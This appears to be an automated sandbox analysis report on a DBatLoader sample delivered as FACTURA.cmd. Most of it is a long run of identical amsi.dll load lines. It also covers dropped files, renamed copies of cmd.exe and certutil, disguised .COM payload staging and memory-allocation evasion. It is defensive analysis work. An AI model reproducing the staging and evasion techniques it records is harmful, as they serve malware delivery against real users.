      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32Jump to behavior
      Source: FACTURA.cmdStatic file information: File size 7518388 > 1048576
      Source: Binary string: easinvoker.pdb source: Host.COM, Host.COM, 00000009.00000002.3035851816.0000000002E1E000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 00000009.00000002.3033680777.0000000002266000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1800195729.000000007FC10000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1801015000.000000007F8A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000003.00000000.1772397847.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000000.1776065689.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000000.1787491764.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000002.1795092771.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1796653193.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1799303779.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1799884208.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1801167117.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.2.dr
      Source: Binary string: certutil.pdb source: kn.exe, 00000006.00000000.1776491756.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1784579470.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1787962388.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1794360108.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp
      Source: Binary string: cmd.pdb source: alpha.exe, 00000003.00000000.1772397847.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000000.1776065689.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000000.1787491764.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000002.1795092771.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1796653193.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1799303779.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1799884208.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1801167117.00007FF793772000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.2.dr
      Source: Binary string: easinvoker.pdbGCTL source: Host.COM, 00000009.00000002.3035851816.0000000002E1E000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1800405801.000000000286A000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000002.3034224686.0000000002871000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000002.3033680777.0000000002266000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1800195729.000000007FC10000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1801015000.000000007F8A0000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: certutil.pdbGCTL source: kn.exe, 00000006.00000000.1776491756.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1784579470.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1787962388.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1794360108.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp

      Data Obfuscation

      barindex
      Yara detected DBatLoader
      Source: Yara matchFile source: 9.2.Host.COM.2df0000.2.unpack, type: UNPACKEDPE
      Source: alpha.exe.2.drStatic PE information: 0xE1CBFC53 [Mon Jan 16 09:26:43 2090 UTC]
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E08954 LoadLibraryW,GetProcAddress,FreeLibrary,9_2_02E08954
      Source: alpha.exe.2.drStatic PE information: section name: .didat
      Source: kn.exe.4.drStatic PE information: section name: .didat
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF7E07C3668 push rsp; ret 6_2_00007FF7E07C3669
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E1D2FC push 02E1D367h; ret 9_2_02E1D35F
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02DF63D3 push 02DF640Bh; ret 9_2_02DF6403
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E1C374 push 02E1C56Ah; ret 9_2_02E1C562
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02DF332C push eax; ret 9_2_02DF3368
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E1D0AC push 02E1D125h; ret 9_2_02E1D11D
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E03073 push 02E030C1h; ret 9_2_02E030B9
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E03074 push 02E030C1h; ret 9_2_02E030B9
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E1D1F8 push 02E1D288h; ret 9_2_02E1D280
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E1D144 push 02E1D1ECh; ret 9_2_02E1D1E4
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E0F104 push ecx; mov dword ptr [esp], edx9_2_02E0F109
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02DF678C push 02DF67CEh; ret 9_2_02DF67C6
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02DF678A push 02DF67CEh; ret 9_2_02DF67C6
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02DFD5A8 push 02DFD5D4h; ret 9_2_02DFD5CC
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E1C56C push 02E1C56Ah; ret 9_2_02E1C562
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02DFC574 push ecx; mov dword ptr [esp], edx9_2_02DFC579
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E08AD2 push 02E08B0Ch; ret 9_2_02E08B04
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E08AD4 push 02E08B0Ch; ret 9_2_02E08B04
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E0AADB push 02E0AB14h; ret 9_2_02E0AB0C
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E0AADC push 02E0AB14h; ret 9_2_02E0AB0C
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02DFCBF4 push 02DFCD7Ah; ret 9_2_02DFCD72
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E08874 push 02E088B6h; ret 9_2_02E088AE
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E64850 push eax; ret 9_2_02E64920
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02DFC9E6 push 02DFCD7Ah; ret 9_2_02DFCD72
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E0694E push 02E069FBh; ret 9_2_02E069F3
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E06950 push 02E069FBh; ret 9_2_02E069F3
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E07914 push 02E07991h; ret 9_2_02E07989
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E05E84 push ecx; mov dword ptr [esp], edx9_2_02E05E86
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E02F68 push 02E02FDEh; ret 9_2_02E02FD6

      Persistence and Installation Behavior

      barindex
      Drops PE files with a suspicious file extension
      Source: C:\Users\Public\kn.exeFile created: C:\Users\Public\Libraries\Host.COMJump to dropped file
      Source: C:\Users\Public\kn.exeFile created: C:\Users\Public\Libraries\Host.COMJump to dropped file
      Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
      Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file
      Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
      Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file

      Boot Survival

      barindex
      Drops PE files to the user root directory
      Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
      Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02DF676A IsIconic,9_2_02DF676A
      Source: C:\Users\Public\Libraries\Host.COMCode function: 9_2_02E0AB18 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,9_2_02E0AB18
      Source: C:\Users\Public\Libraries\Host.COMRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Allocates many large memory junks
      Source: C:\Users\Public\Libraries\Host.COMMemory allocated: 2DF0000 memory commit 570007552Jump to behavior
      Source: C:\Users\Public\Libraries\Host.COMMemory allocated: 2DF1000 memory commit 570179584Jump to behavior
      Source: C:\Users\Public\Libraries\Host.COMMemory allocated: 2E1D000 memory commit 570003456Jump to behavior
      Source: C:\Users\Public\Libraries\Host.COMMemory allocated: 2E1E000 memory commit 570351616Jump to behavior
      Source: C:\Users\Public\Libraries\Host.COMMemory allocated: 2E74000 memory commit 571015168Jump to behavior
      Source: C:\Users\Public\Libraries\Host.COMMemory allocated: 2F6E000 memory commit 570015744Jump to behavior
      Source: C:\Users\Public\alpha.exeAPI coverage: 8.1 %
      Source: C:\Users\Public\alpha.exeAPI coverage: 8.6 %
      Source: C:\Users\Public\kn.exeAPI coverage: 0.8 %
      Source: C:\Users\Public\alpha.exeAPI coverage: 9.6 %
      Source: C:\Users\Public\alpha.exeAPI coverage: 9.6 %
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF79375823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,3_2_00007FF79375823C
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF793752978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,3_2_00007FF793752978
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF793767B4C FindFirstFileW,FindNextFileW,FindClose,3_2_00007FF793767B4C
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7937435B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,3_2_00007FF7937435B8
      Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF793741560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,3_2_00007FF793741560
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF79375823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,5_2_00007FF79375823C
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF793752978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,5_2_00007FF793752978
      Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF793767B4C FindFirstFileW,FindNextFileW,FindClose,5_2_00007FF793767B4C
